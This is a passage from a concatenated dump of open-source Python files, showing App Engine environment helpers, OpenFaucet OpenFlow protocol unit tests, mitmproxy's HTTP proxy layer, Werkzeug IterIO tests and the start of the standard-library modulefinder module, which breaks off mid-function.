return is_appengine() and not is_prod_appengine_mvms()
def is_local_appengine():
return ('APPENGINE_RUNTIME' in os.environ and
'Development/' in os.environ['SERVER_SOFTWARE'])
def is_prod_appengine():
return ('APPENGINE_RUNTIME' in os.environ and
'Google App Engine/' in os.environ['SERVER_SOFTWARE'] and
not is_prod_appengine_mvms())
def is_prod_appengine_mvms():
return os.environ.get('GAE_VM', False) == 'true'
| mit |
rlenglet/openfaucet | src/openfaucet/test_ofprotoops.py | 1 | 11805 | # Copyright 2011 Midokura KK
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unittests for ofprotoops.py.
"""
import struct
import unittest2
import weakref
import twisted.internet.address
import twisted.internet.error
import twisted.python.failure
from openfaucet import ofproto
from openfaucet import ofprotoops
from openfaucet import mock_ofproto
from openfaucet import mock_twisted
from openfaucet import mock_vendor
class TestOpenflowProtocolOperations(unittest2.TestCase):
def setUp(self):
self.reactor = mock_twisted.MockReactorTime()
self.default_op_timeout = 3
self.echo_op_period = 5
self.peerproto = mock_ofproto.MockOpenflowProtocolHandler()
self.peer_vendor_handler = mock_vendor.MockVendorHandler()
self.peerproto.vendor_handlers = (self.peer_vendor_handler,)
self.peer_vendor_handler.protocol = weakref.ref(self.peerproto)
self.proto = ofprotoops.OpenflowProtocolOperations()
self.vendor_handler = mock_vendor.MockVendorHandler()
self.proto.vendor_handlers = (self.vendor_handler,)
self.vendor_handler.protocol = weakref.ref(self.proto)
self.proto.reactor = self.reactor
self.proto.default_op_timeout = self.default_op_timeout
self.proto.echo_op_period = self.echo_op_period
host_address = twisted.internet.address.IPv4Address(
'TCP', '192.168.1.1', '14123')
peer_address = twisted.internet.address.IPv4Address(
'TCP', '192.168.1.2', '14567')
self.proto.transport = mock_ofproto.LoopbackTransport(
self.peerproto, host_address, peer_address)
self.peerproto.transport = mock_ofproto.LoopbackTransport(
self.proto, peer_address, host_address)
self.peerproto.connectionMade()
def _get_next_sent_message(self):
"""Get the decoded next message sent by the protocol.
Returns:
A tuple describing a single message, or None if no message
was sent.
"""
calls_made = self.peerproto.calls_made
if not calls_made:
return None
m = calls_made[0]
self.peerproto.calls_made = calls_made[1:]
return m
def test_connection_made_send_hello_echo_request(self):
self.proto.connectionMade()
# Sent initial OFPT_HELLO with XID 0.
self.assertTupleEqual(('handle_hello',),
self._get_next_sent_message())
# Sent initial OFPT_ECHO_REQUEST with XID 0.
self.assertEqual('handle_echo_request',
self._get_next_sent_message()[0])
def test_connection_lost_ops_timeout(self):
self.proto.connectionMade()
self._get_next_sent_message() # Initial OFPT_HELLO.
self._get_next_sent_message() # Initial OFPT_ECHO_REQUEST.
# Send 2 more echo requests.
self.proto._echo()
self.proto._echo()
self.assertItemsEqual(
[mock_twisted.MockDelayedCall(
reactor_time=self.reactor,
time=self.default_op_timeout,
already_cancelled=False,
already_called=False,
callable=self.proto._timeout_operation,
args=(0,),
kw={}),
mock_twisted.MockDelayedCall(
reactor_time=self.reactor,
time=self.default_op_timeout,
already_cancelled=False,
already_called=False,
callable=self.proto._timeout_operation,
args=(1,),
kw={}),
mock_twisted.MockDelayedCall(
reactor_time=self.reactor,
time=self.default_op_timeout,
already_cancelled=False,
already_called=False,
callable=self.proto._timeout_operation,
args=(2,),
kw={}),
], self.reactor.delayed_calls)
self.proto.connectionLost(twisted.python.failure.Failure(
twisted.internet.error.ConnectionLost()))
self.assertItemsEqual([], self.reactor.delayed_calls)
def test_echo_op_periodic(self):
self.proto.connectionMade()
self._get_next_sent_message() # Initial OFPT_HELLO.
# Initial OFPT_ECHO_REQUEST with XID 0.
next_msg = self._get_next_sent_message()
self.assertEqual('handle_echo_request', next_msg[0])
self.assertEqual(0, next_msg[1])
data = next_msg[2] # 32-big random data
self.assertItemsEqual(
[mock_twisted.MockDelayedCall(
reactor_time=self.reactor,
time=self.default_op_timeout,
already_cancelled=False,
already_called=False,
callable=self.proto._timeout_operation,
args=(0,),
kw={}),
], self.reactor.delayed_calls)
# Receive the reply after 2s, before timeout.
self.reactor.increment_time(2)
self.assertItemsEqual(
[mock_twisted.MockDelayedCall(
reactor_time=self.reactor,
time=self.default_op_timeout,
already_cancelled=False,
already_called=False,
callable=self.proto._timeout_operation,
args=(0,),
kw={}),
], self.reactor.delayed_calls)
self.peerproto.send_echo_reply(0, (data,))
self.assertItemsEqual(
[mock_twisted.MockDelayedCall(
reactor_time=self.reactor,
time=self.reactor.seconds() + self.echo_op_period,
already_cancelled=False,
already_called=False,
callable=self.proto._echo,
args=(),
kw={}),
], self.reactor.delayed_calls)
# Next OFPT_ECHO_REQUEST with XID 1.
self.reactor.increment_time(self.echo_op_period)
next_msg = self._get_next_sent_message()
self.assertEqual('handle_echo_request', next_msg[0])
self.assertEqual(1, next_msg[1])
data = next_msg[2] # 32-big random data
self.assertItemsEqual(
[mock_twisted.MockDelayedCall(
reactor_time=self.reactor,
time=self.reactor.seconds() + self.default_op_timeout,
already_cancelled=False,
already_called=False,
callable=self.proto._timeout_operation,
args=(1,),
kw={}),
], self.reactor.delayed_calls)
def test_echo_op_timeout(self):
self.proto.connectionMade()
self._get_next_sent_message() # Initial OFPT_HELLO.
# Initial OFPT_ECHO_REQUEST with XID 0.
next_msg = self._get_next_sent_message()
self.assertEqual('handle_echo_request', next_msg[0])
self.assertEqual(0, next_msg[1])
data = next_msg[2] # 32-big random data
self.assertItemsEqual(
[mock_twisted.MockDelayedCall(
reactor_time=self.reactor,
time=self.default_op_timeout,
already_cancelled=False,
already_called=False,
callable=self.proto._timeout_operation,
args=(0,),
kw={}),
], self.reactor.delayed_calls)
self.assertTrue(self.proto.transport.open) # Connection open.
# Let the echo operation time out.
self.reactor.increment_time(self.default_op_timeout)
self.assertFalse(self.proto.transport.open) # Connection closed.
def test_echo_op_wrong_data(self):
self.proto.connectionMade()
self._get_next_sent_message() # Initial OFPT_HELLO.
# Initial OFPT_ECHO_REQUEST with XID 0.
next_msg = self._get_next_sent_message()
self.assertEqual('handle_echo_request', next_msg[0])
self.assertEqual(0, next_msg[1])
data = next_msg[2] # 32-big random data
self.assertItemsEqual(
[mock_twisted.MockDelayedCall(
reactor_time=self.reactor,
time=self.default_op_timeout,
already_cancelled=False,
already_called=False,
callable=self.proto._timeout_operation,
args=(0,),
kw={}),
], self.reactor.delayed_calls)
# Receive the reply with wrong data, after 2s, before timeout.
self.reactor.increment_time(2)
self.assertItemsEqual(
[mock_twisted.MockDelayedCall(
reactor_time=self.reactor,
time=self.default_op_timeout,
already_cancelled=False,
already_called=False,
callable=self.proto._timeout_operation,
args=(0,),
kw={}),
], self.reactor.delayed_calls)
self.peerproto.send_echo_reply(0, ('garbage' + data,))
# No error message sent back, as this is not a standard error.
self.assertIsNone(self._get_next_sent_message())
def test_handle_echo_request(self):
self.proto.connectionMade()
self._get_next_sent_message() # Initial OFPT_HELLO.
self._get_next_sent_message() # Initial OFPT_ECHO_REQUEST.
self.peerproto.send_echo_request(4, ('abcdefgh',))
# Sent back an OFPT_ECHO_REPLY with same length, data, and XID 4.
self.assertEqual(('handle_echo_reply', 4, 'abcdefgh'),
self._get_next_sent_message())
class TestOpenflowProtocolOperationsFactory(unittest2.TestCase):
def setUp(self):
self.vendor_handler_classes = (mock_vendor.MockVendorHandler,)
self.reactor = mock_twisted.MockReactorTime()
self.factory = ofprotoops.OpenflowProtocolOperationsFactory(
protocol=ofprotoops.OpenflowProtocolOperations,
error_data_bytes=64, vendor_handlers=self.vendor_handler_classes,
reactor=self.reactor, default_op_timeout=4.0, echo_op_period=6.0)
self.addr = twisted.internet.address.IPv4Address('TCP', '192.168.1.1',
'14123')
def test_build_protocol_reactor(self):
self.factory.doStart()
proto = self.factory.buildProtocol(self.addr)
self.assertEqual(self.reactor, proto.reactor)
self.factory.doStop()
def test_build_protocol_default_op_timeout(self):
self.factory._default_op_timeout = 42.0
self.factory.doStart()
proto = self.factory.buildProtocol(self.addr)
self.assertEqual(42.0, proto.default_op_timeout)
self.factory.doStop()
def test_build_protocol_echo_op_period(self):
self.factory._echo_op_period = 42.0
self.factory.doStart()
proto = self.factory.buildProtocol(self.addr)
self.assertEqual(42.0, proto.echo_op_period)
self.factory.doStop()
if __name__ == '__main__':
# Disable logging during unittests.
import logging
logging.basicConfig(level=logging.CRITICAL)
#logging.basicConfig(level=logging.DEBUG,
# format='%(asctime)s %(levelname)s %(message)s',
# filename='unittest.log',
# filemode='w')
unittest2.main()
| apache-2.0 |
ddworken/mitmproxy | mitmproxy/proxy/protocol/http.py | 1 | 19394 | import h2.exceptions
import time
import enum
from mitmproxy import connections # noqa
from mitmproxy import exceptions
from mitmproxy import http
from mitmproxy import flow
from mitmproxy.proxy.protocol import base
from mitmproxy.proxy.protocol.websocket import WebSocketLayer
from mitmproxy.net import websockets
class _HttpTransmissionLayer(base.Layer):
def read_request_headers(self, flow):
raise NotImplementedError()
def read_request_body(self, request):
raise NotImplementedError()
def send_request(self, request):
raise NotImplementedError()
def read_response_headers(self):
raise NotImplementedError()
def read_response_body(self, request, response):
raise NotImplementedError()
yield "this is a generator" # pragma: no cover
def read_response(self, request):
response = self.read_response_headers()
response.data.content = b"".join(
self.read_response_body(request, response)
)
return response
def send_response(self, response):
if response.data.content is None:
raise exceptions.HttpException("Cannot assemble flow with missing content")
self.send_response_headers(response)
self.send_response_body(response, [response.data.content])
def send_response_headers(self, response):
raise NotImplementedError()
def send_response_body(self, response, chunks):
raise NotImplementedError()
def check_close_connection(self, f):
raise NotImplementedError()
class ConnectServerConnection:
"""
"Fake" ServerConnection to represent state after a CONNECT request to an upstream proxy.
"""
def __init__(self, address, ctx):
self.address = address
self._ctx = ctx
@property
def via(self):
return self._ctx.server_conn
def __getattr__(self, item):
return getattr(self.via, item)
def connected(self):
return self.via.connected()
class UpstreamConnectLayer(base.Layer):
def __init__(self, ctx, connect_request):
super().__init__(ctx)
self.connect_request = connect_request
self.server_conn = ConnectServerConnection(
(connect_request.host, connect_request.port),
self.ctx
)
def __call__(self):
layer = self.ctx.next_layer(self)
layer()
def _send_connect_request(self):
self.log("Sending CONNECT request", "debug", [
"Proxy Server: {}".format(self.ctx.server_conn.address),
"Connect to: {}:{}".format(self.connect_request.host, self.connect_request.port)
])
self.send_request(self.connect_request)
resp = self.read_response(self.connect_request)
if resp.status_code != 200:
raise exceptions.ProtocolException("Reconnect: Upstream server refuses CONNECT request")
def connect(self):
if not self.server_conn.connected():
self.ctx.connect()
self._send_connect_request()
else:
pass # swallow the message
def change_upstream_proxy_server(self, address):
self.log("Changing upstream proxy to {} (CONNECTed)".format(repr(address)), "debug")
if address != self.server_conn.via.address:
self.ctx.set_server(address)
def set_server(self, address):
if self.ctx.server_conn.connected():
self.ctx.disconnect()
self.connect_request.host = address[0]
self.connect_request.port = address[1]
self.server_conn.address = address
def is_ok(status):
return 200 <= status < 300
class HTTPMode(enum.Enum):
regular = 1
transparent = 2
upstream = 3
# At this point, we see only a subset of the proxy modes
MODE_REQUEST_FORMS = {
HTTPMode.regular: ("authority", "absolute"),
HTTPMode.transparent: ("relative",),
HTTPMode.upstream: ("authority", "absolute"),
}
def validate_request_form(mode, request):
if request.first_line_format == "absolute" and request.scheme != "http":
raise exceptions.HttpException(
"Invalid request scheme: %s" % request.scheme
)
allowed_request_forms = MODE_REQUEST_FORMS[mode]
if request.first_line_format not in allowed_request_forms:
if mode == HTTPMode.transparent:
err_message = (
"""
Mitmproxy received an {} request even though it is not running
in regular mode. This usually indicates a misconfiguration,
please see the mitmproxy mode documentation for details.
"""
).format("HTTP CONNECT" if request.first_line_format == "authority" else "absolute-form")
else:
err_message = "Invalid HTTP request form (expected: %s, got: %s)" % (
" or ".join(allowed_request_forms), request.first_line_format
)
raise exceptions.HttpException(err_message)
class HttpLayer(base.Layer):
if False:
# mypy type hints
server_conn = None # type: connections.ServerConnection
def __init__(self, ctx, mode):
super().__init__(ctx)
self.mode = mode
self.__initial_server_conn = None
"Contains the original destination in transparent mode, which needs to be restored"
"if an inline script modified the target server for a single http request"
# We cannot rely on server_conn.tls_established,
# see https://github.com/mitmproxy/mitmproxy/issues/925
self.__initial_server_tls = None
# Requests happening after CONNECT do not need Proxy-Authorization headers.
self.connect_request = False
def __call__(self):
if self.mode == HTTPMode.transparent:
self.__initial_server_tls = self.server_tls
self.__initial_server_conn = self.server_conn
while True:
flow = http.HTTPFlow(
self.client_conn,
self.server_conn,
live=self,
mode=self.mode.name
)
if not self._process_flow(flow):
return
def handle_regular_connect(self, f):
self.connect_request = True
try:
self.set_server((f.request.host, f.request.port))
if f.response:
resp = f.response
else:
resp = http.make_connect_response(f.request.data.http_version)
self.send_response(resp)
if is_ok(resp.status_code):
layer = self.ctx.next_layer(self)
layer()
except (
exceptions.ProtocolException, exceptions.NetlibException
) as e:
# HTTPS tasting means that ordinary errors like resolution
# and connection errors can happen here.
self.send_error_response(502, repr(e))
f.error = flow.Error(str(e))
self.channel.ask("error", f)
return False
return False
def handle_upstream_connect(self, f):
# if the user specifies a response in the http_connect hook, we do not connect upstream here.
# https://github.com/mitmproxy/mitmproxy/pull/2473
if not f.response:
self.establish_server_connection(
f.request.host,
f.request.port,
f.request.scheme
)
self.send_request(f.request)
f.response = self.read_response_headers()
f.response.data.content = b"".join(
self.read_response_body(f.request, f.response)
)
self.send_response(f.response)
if is_ok(f.response.status_code):
layer = UpstreamConnectLayer(self, f.request)
return layer()
return False
def _process_flow(self, f):
try:
try:
request = self.read_request_headers(f)
except exceptions.HttpReadDisconnect:
# don't throw an error for disconnects that happen
# before/between requests.
return False
f.request = request
if request.first_line_format == "authority":
# The standards are silent on what we should do with a CONNECT
# request body, so although it's not common, it's allowed.
f.request.data.content = b"".join(
self.read_request_body(f.request)
)
f.request.timestamp_end = time.time()
self.channel.ask("http_connect", f)
if self.mode is HTTPMode.regular:
return self.handle_regular_connect(f)
elif self.mode is HTTPMode.upstream:
return self.handle_upstream_connect(f)
else:
msg = "Unexpected CONNECT request."
self.send_error_response(400, msg)
raise exceptions.ProtocolException(msg)
validate_request_form(self.mode, request)
self.channel.ask("requestheaders", f)
# Re-validate request form in case the user has changed something.
validate_request_form(self.mode, request)
if request.headers.get("expect", "").lower() == "100-continue":
# TODO: We may have to use send_response_headers for HTTP2
# here.
self.send_response(http.expect_continue_response)
request.headers.pop("expect")
if f.request.stream:
f.request.data.content = None
else:
f.request.data.content = b"".join(self.read_request_body(request))
request.timestamp_end = time.time()
except exceptions.HttpException as e:
# We optimistically guess there might be an HTTP client on the
# other end
self.send_error_response(400, repr(e))
# Request may be malformed at this point, so we unset it.
f.request = None
f.error = flow.Error(str(e))
self.channel.ask("error", f)
raise exceptions.ProtocolException(
"HTTP protocol error in client request: {}".format(e)
)
self.log("request", "debug", [repr(request)])
# set first line format to relative in regular mode,
# see https://github.com/mitmproxy/mitmproxy/issues/1759
if self.mode is HTTPMode.regular and request.first_line_format == "absolute":
request.first_line_format = "relative"
# update host header in reverse proxy mode
if self.config.options.mode.startswith("reverse:") and not self.config.options.keep_host_header:
f.request.host_header = self.config.upstream_server.address[0]
# Determine .scheme, .host and .port attributes for inline scripts. For
# absolute-form requests, they are directly given in the request. For
# authority-form requests, we only need to determine the request
# scheme. For relative-form requests, we need to determine host and
# port as well.
if self.mode is HTTPMode.transparent:
# Setting request.host also updates the host header, which we want
# to preserve
host_header = f.request.host_header
f.request.host = self.__initial_server_conn.address[0]
f.request.port = self.__initial_server_conn.address[1]
f.request.host_header = host_header # set again as .host overwrites this.
f.request.scheme = "https" if self.__initial_server_tls else "http"
self.channel.ask("request", f)
try:
if websockets.check_handshake(request.headers) and websockets.check_client_version(request.headers):
# We only support RFC6455 with WebSocket version 13
# allow inline scripts to manipulate the client handshake
self.channel.ask("websocket_handshake", f)
if not f.response:
self.establish_server_connection(
f.request.host,
f.request.port,
f.request.scheme
)
try:
self.send_request_headers(f.request)
except exceptions.NetlibException as e:
self.log(
"server communication error: %s" % repr(e),
level="debug"
)
# In any case, we try to reconnect at least once. This is
# necessary because it might be possible that we already
# initiated an upstream connection after clientconnect that
# has already been expired, e.g consider the following event
# log:
# > clientconnect (transparent mode destination known)
# > serverconnect (required for client tls handshake)
# > read n% of large request
# > server detects timeout, disconnects
# > read (100-n)% of large request
# > send large request upstream
if isinstance(e, exceptions.Http2ProtocolException):
# do not try to reconnect for HTTP2
raise exceptions.ProtocolException(
"First and only attempt to get response via HTTP2 failed."
)
self.disconnect()
self.connect()
self.send_request_headers(f.request)
# This is taken out of the try except block because when streaming
# we can't send the request body while retrying as the generator gets exhausted
if f.request.stream:
chunks = self.read_request_body(f.request)
if callable(f.request.stream):
chunks = f.request.stream(chunks)
self.send_request_body(f.request, chunks)
else:
self.send_request_body(f.request, [f.request.data.content])
f.response = self.read_response_headers()
# call the appropriate script hook - this is an opportunity for
# an inline script to set f.stream = True
self.channel.ask("responseheaders", f)
if f.response.stream:
f.response.data.content = None
else:
f.response.data.content = b"".join(
self.read_response_body(f.request, f.response)
)
f.response.timestamp_end = time.time()
# no further manipulation of self.server_conn beyond this point
# we can safely set it as the final attribute value here.
f.server_conn = self.server_conn
else:
# response was set by an inline script.
# we now need to emulate the responseheaders hook.
self.channel.ask("responseheaders", f)
self.log("response", "debug", [repr(f.response)])
self.channel.ask("response", f)
if not f.response.stream:
# no streaming:
# we already received the full response from the server and can
# send it to the client straight away.
self.send_response(f.response)
else:
# streaming:
# First send the headers and then transfer the response incrementally
self.send_response_headers(f.response)
chunks = self.read_response_body(
f.request,
f.response
)
if callable(f.response.stream):
chunks = f.response.stream(chunks)
self.send_response_body(f.response, chunks)
f.response.timestamp_end = time.time()
if self.check_close_connection(f):
return False
# Handle 101 Switching Protocols
if f.response.status_code == 101:
# Handle a successful HTTP 101 Switching Protocols Response,
# received after e.g. a WebSocket upgrade request.
# Check for WebSocket handshake
is_websocket = (
websockets.check_handshake(f.request.headers) and
websockets.check_handshake(f.response.headers)
)
if is_websocket and not self.config.options.websocket:
self.log(
"Client requested WebSocket connection, but the protocol is disabled.",
"info"
)
if is_websocket and self.config.options.websocket:
layer = WebSocketLayer(self, f)
else:
layer = self.ctx.next_layer(self)
layer()
return False # should never be reached
except (exceptions.ProtocolException, exceptions.NetlibException) as e:
self.send_error_response(502, repr(e))
if not f.response:
f.error = flow.Error(str(e))
self.channel.ask("error", f)
return False
else:
raise exceptions.ProtocolException(
"Error in HTTP connection: %s" % repr(e)
)
finally:
if f:
f.live = False
return True
def send_error_response(self, code, message, headers=None) -> None:
try:
response = http.make_error_response(code, message, headers)
self.send_response(response)
except (exceptions.NetlibException, h2.exceptions.H2Error, exceptions.Http2ProtocolException):
self.log("Failed to send error response to client: {}".format(message), "debug")
def change_upstream_proxy_server(self, address):
# Make set_upstream_proxy_server always available,
# even if there's no UpstreamConnectLayer
if hasattr(self.ctx, "change_upstream_proxy_server"):
self.ctx.change_upstream_proxy_server(address)
elif address != self.server_conn.address:
self.log("Changing upstream proxy to {} (not CONNECTed)".format(repr(address)), "debug")
self.set_server(address)
def establish_server_connection(self, host: str, port: int, scheme: str):
tls = (scheme == "https")
if self.mode is HTTPMode.regular or self.mode is HTTPMode.transparent:
# If there's an existing connection that doesn't match our expectations, kill it.
address = (host, port)
if address != self.server_conn.address or tls != self.server_tls:
self.set_server(address)
self.set_server_tls(tls, address[0])
# Establish connection is neccessary.
if not self.server_conn.connected():
self.connect()
else:
if not self.server_conn.connected():
self.connect()
if tls:
raise exceptions.HttpProtocolException("Cannot change scheme in upstream proxy mode.")
| mit |
MissCatLady/AlarmEZ | venv/lib/python2.7/site-packages/werkzeug/testsuite/contrib/iterio.py | 146 | 6123 | # -*- coding: utf-8 -*-
"""
werkzeug.testsuite.iterio
~~~~~~~~~~~~~~~~~~~~~~~~~
Tests the iterio object.
:copyright: (c) 2014 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import unittest
from functools import partial
from werkzeug.testsuite import WerkzeugTestCase
from werkzeug.contrib.iterio import IterIO, greenlet
class IterOTestSuite(WerkzeugTestCase):
def test_basic_native(self):
io = IterIO(["Hello", "World", "1", "2", "3"])
self.assert_equal(io.tell(), 0)
self.assert_equal(io.read(2), "He")
self.assert_equal(io.tell(), 2)
self.assert_equal(io.read(3), "llo")
self.assert_equal(io.tell(), 5)
io.seek(0)
self.assert_equal(io.read(5), "Hello")
self.assert_equal(io.tell(), 5)
self.assert_equal(io._buf, "Hello")
self.assert_equal(io.read(), "World123")
self.assert_equal(io.tell(), 13)
io.close()
assert io.closed
io = IterIO(["Hello\n", "World!"])
self.assert_equal(io.readline(), 'Hello\n')
self.assert_equal(io._buf, 'Hello\n')
self.assert_equal(io.read(), 'World!')
self.assert_equal(io._buf, 'Hello\nWorld!')
self.assert_equal(io.tell(), 12)
io.seek(0)
self.assert_equal(io.readlines(), ['Hello\n', 'World!'])
io = IterIO(["foo\n", "bar"])
io.seek(-4, 2)
self.assert_equal(io.read(4), '\nbar')
self.assert_raises(IOError, io.seek, 2, 100)
io.close()
self.assert_raises(ValueError, io.read)
def test_basic_bytes(self):
io = IterIO([b"Hello", b"World", b"1", b"2", b"3"])
self.assert_equal(io.tell(), 0)
self.assert_equal(io.read(2), b"He")
self.assert_equal(io.tell(), 2)
self.assert_equal(io.read(3), b"llo")
self.assert_equal(io.tell(), 5)
io.seek(0)
self.assert_equal(io.read(5), b"Hello")
self.assert_equal(io.tell(), 5)
self.assert_equal(io._buf, b"Hello")
self.assert_equal(io.read(), b"World123")
self.assert_equal(io.tell(), 13)
io.close()
assert io.closed
io = IterIO([b"Hello\n", b"World!"])
self.assert_equal(io.readline(), b'Hello\n')
self.assert_equal(io._buf, b'Hello\n')
self.assert_equal(io.read(), b'World!')
self.assert_equal(io._buf, b'Hello\nWorld!')
self.assert_equal(io.tell(), 12)
io.seek(0)
self.assert_equal(io.readlines(), [b'Hello\n', b'World!'])
io = IterIO([b"foo\n", b"bar"])
io.seek(-4, 2)
self.assert_equal(io.read(4), b'\nbar')
self.assert_raises(IOError, io.seek, 2, 100)
io.close()
self.assert_raises(ValueError, io.read)
def test_basic_unicode(self):
io = IterIO([u"Hello", u"World", u"1", u"2", u"3"])
self.assert_equal(io.tell(), 0)
self.assert_equal(io.read(2), u"He")
self.assert_equal(io.tell(), 2)
self.assert_equal(io.read(3), u"llo")
self.assert_equal(io.tell(), 5)
io.seek(0)
self.assert_equal(io.read(5), u"Hello")
self.assert_equal(io.tell(), 5)
self.assert_equal(io._buf, u"Hello")
self.assert_equal(io.read(), u"World123")
self.assert_equal(io.tell(), 13)
io.close()
assert io.closed
io = IterIO([u"Hello\n", u"World!"])
self.assert_equal(io.readline(), u'Hello\n')
self.assert_equal(io._buf, u'Hello\n')
self.assert_equal(io.read(), u'World!')
self.assert_equal(io._buf, u'Hello\nWorld!')
self.assert_equal(io.tell(), 12)
io.seek(0)
self.assert_equal(io.readlines(), [u'Hello\n', u'World!'])
io = IterIO([u"foo\n", u"bar"])
io.seek(-4, 2)
self.assert_equal(io.read(4), u'\nbar')
self.assert_raises(IOError, io.seek, 2, 100)
io.close()
self.assert_raises(ValueError, io.read)
def test_sentinel_cases(self):
io = IterIO([])
self.assert_strict_equal(io.read(), '')
io = IterIO([], b'')
self.assert_strict_equal(io.read(), b'')
io = IterIO([], u'')
self.assert_strict_equal(io.read(), u'')
io = IterIO([])
self.assert_strict_equal(io.read(), '')
io = IterIO([b''])
self.assert_strict_equal(io.read(), b'')
io = IterIO([u''])
self.assert_strict_equal(io.read(), u'')
io = IterIO([])
self.assert_strict_equal(io.readline(), '')
io = IterIO([], b'')
self.assert_strict_equal(io.readline(), b'')
io = IterIO([], u'')
self.assert_strict_equal(io.readline(), u'')
io = IterIO([])
self.assert_strict_equal(io.readline(), '')
io = IterIO([b''])
self.assert_strict_equal(io.readline(), b'')
io = IterIO([u''])
self.assert_strict_equal(io.readline(), u'')
class IterITestSuite(WerkzeugTestCase):
def test_basic(self):
def producer(out):
out.write('1\n')
out.write('2\n')
out.flush()
out.write('3\n')
iterable = IterIO(producer)
self.assert_equal(next(iterable), '1\n2\n')
self.assert_equal(next(iterable), '3\n')
self.assert_raises(StopIteration, next, iterable)
def test_sentinel_cases(self):
def producer_dummy_flush(out):
out.flush()
iterable = IterIO(producer_dummy_flush)
self.assert_strict_equal(next(iterable), '')
def producer_empty(out):
pass
iterable = IterIO(producer_empty)
self.assert_raises(StopIteration, next, iterable)
iterable = IterIO(producer_dummy_flush, b'')
self.assert_strict_equal(next(iterable), b'')
iterable = IterIO(producer_dummy_flush, u'')
self.assert_strict_equal(next(iterable), u'')
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(IterOTestSuite))
if greenlet is not None:
suite.addTest(unittest.makeSuite(IterITestSuite))
return suite
| mit |
kemalakyol48/python-for-android | python3-alpha/python3-src/Lib/modulefinder.py | 50 | 24112 | """Find modules used by a script, using introspection."""
from __future__ import generators
import dis
import imp
import marshal
import os
import sys
import types
import struct
READ_MODE = "rU"
# XXX Clean up once str8's cstor matches bytes.
LOAD_CONST = bytes([dis.opname.index('LOAD_CONST')])
IMPORT_NAME = bytes([dis.opname.index('IMPORT_NAME')])
STORE_NAME = bytes([dis.opname.index('STORE_NAME')])
STORE_GLOBAL = bytes([dis.opname.index('STORE_GLOBAL')])
STORE_OPS = [STORE_NAME, STORE_GLOBAL]
HAVE_ARGUMENT = bytes([dis.HAVE_ARGUMENT])
# Modulefinder does a good job at simulating Python's, but it can not
# handle __path__ modifications packages make at runtime. Therefore there
# is a mechanism whereby you can register extra paths in this map for a
# package, and it will be honored.
# Note this is a mapping is lists of paths.
packagePathMap = {}
# A Public interface
def AddPackagePath(packagename, path):
paths = packagePathMap.get(packagename, [])
paths.append(path)
packagePathMap[packagename] = paths
replacePackageMap = {}
# This ReplacePackage mechanism allows modulefinder to work around
# situations in which a package injects itself under the name
# of another package into sys.modules at runtime by calling
# ReplacePackage("real_package_name", "faked_package_name")
# before running ModuleFinder.
def ReplacePackage(oldname, newname):
replacePackageMap[oldname] = newname
class Module:
def __init__(self, name, file=None, path=None):
self.__name__ = name
self.__file__ = file
self.__path__ = path
self.__code__ = None
# The set of global names that are assigned to in the module.
# This includes those names imported through starimports of
# Python modules.
self.globalnames = {}
# The set of starimports this module did that could not be
# resolved, ie. a starimport from a non-Python module.
self.starimports = {}
def __repr__(self):
s = "Module(%r" % (self.__name__,)
if self.__file__ is not None:
s = s + ", %r" % (self.__file__,)
if self.__path__ is not None:
s = s + ", %r" % (self.__path__,)
s = s + ")"
return s
class ModuleFinder:
def __init__(self, path=None, debug=0, excludes=[], replace_paths=[]):
if path is None:
path = sys.path
self.path = path
self.modules = {}
self.badmodules = {}
self.debug = debug
self.indent = 0
self.excludes = excludes
self.replace_paths = replace_paths
self.processed_paths = [] # Used in debugging only
def msg(self, level, str, *args):
if level <= self.debug:
for i in range(self.indent):
print(" ", end=' ')
print(str, end=' ')
for arg in args:
print(repr(arg), end=' ')
print()
def msgin(self, *args):
level = args[0]
if level <= self.debug:
self.indent = self.indent + 1
self.msg(*args)
def msgout(self, *args):
level = args[0]
if level <= self.debug:
self.indent = self.indent - 1
self.msg(*args)
def run_script(self, pathname):
self.msg(2, "run_script", pathname)
with open(pathname, READ_MODE) as fp:
stuff = ("", "r", imp.PY_SOURCE)
self.load_module('__main__', fp, pathname, stuff)
def load_file(self, pathname):
dir, name = os.path.split(pathname)
name, ext = os.path.splitext(name)
with open(pathname, READ_MODE) as fp:
stuff = (ext, "r", imp.PY_SOURCE)
self.load_module(name, fp, pathname, stuff)
def import_hook(self, name, caller=None, fromlist=None, level=-1):
self.msg(3, "import_hook", name, caller, fromlist, level)
parent = self.determine_parent(caller, level=level)
q, tail = self.find_head_package(parent, name)
m = self.load_tail(q, tail)
if not fromlist:
return q
if m.__path__:
self.ensure_fromlist(m, fromlist)
return None
def determine_parent(self, caller, level=-1):
self.msgin(4, "determine_parent", caller, level)
if not caller or level == 0:
self.msgout(4, "determine_parent -> None")
return None
pname = caller.__name__
if level >= 1: # relative import
if caller.__path__:
level -= 1
if level == 0:
parent = self.modules[pname]
assert parent is caller
self.msgout(4, "determine_parent ->", parent)
return parent
if pname.count(".") < level:
raise ImportError("relative importpath too deep")
pname = ".".join(pname.split(".")[:-level])
parent = self.modules[pname]
self.msgout(4, "determine_parent ->", parent)
return parent
if caller.__path__:
parent = self.modules[pname]
assert caller is parent
self.msgout(4, "determine_parent ->", parent)
return parent
if '.' in pname:
i = pname.rfind('.')
pname = pname[:i]
parent = self.modules[pname]
assert parent.__name__ == pname
self.msgout(4, "determine_parent ->", parent)
return parent
self.msgout(4, "determine_parent -> None")
return None
def find_head_package(self, parent, name):
self.msgin(4, "find_head_package", parent, name)
if '.' in name:
i = name.find('.')
head = name[:i]
tail = name[i+1:]
else:
head = name
tail = ""
if parent:
qname = "%s.%s" % (parent.__name__, head)
else:
qname = head
q = self.import_module(head, qname, parent)
if q:
self.msgout(4, "find_head_package ->", (q, tail))
return q, tail
if parent:
qname = head
parent = None
q = self.import_module(head, qname, parent)
if q:
self.msgout(4, "find_head_package ->", (q, tail))
return q, tail
self.msgout(4, "raise ImportError: No module named", qname)
raise ImportError("No module named " + qname)
def load_tail(self, q, tail):
self.msgin(4, "load_tail", q, tail)
m = q
while tail:
i = tail.find('.')
if i < 0: i = len(tail)
head, tail = tail[:i], tail[i+1:]
mname = "%s.%s" % (m.__name__, head)
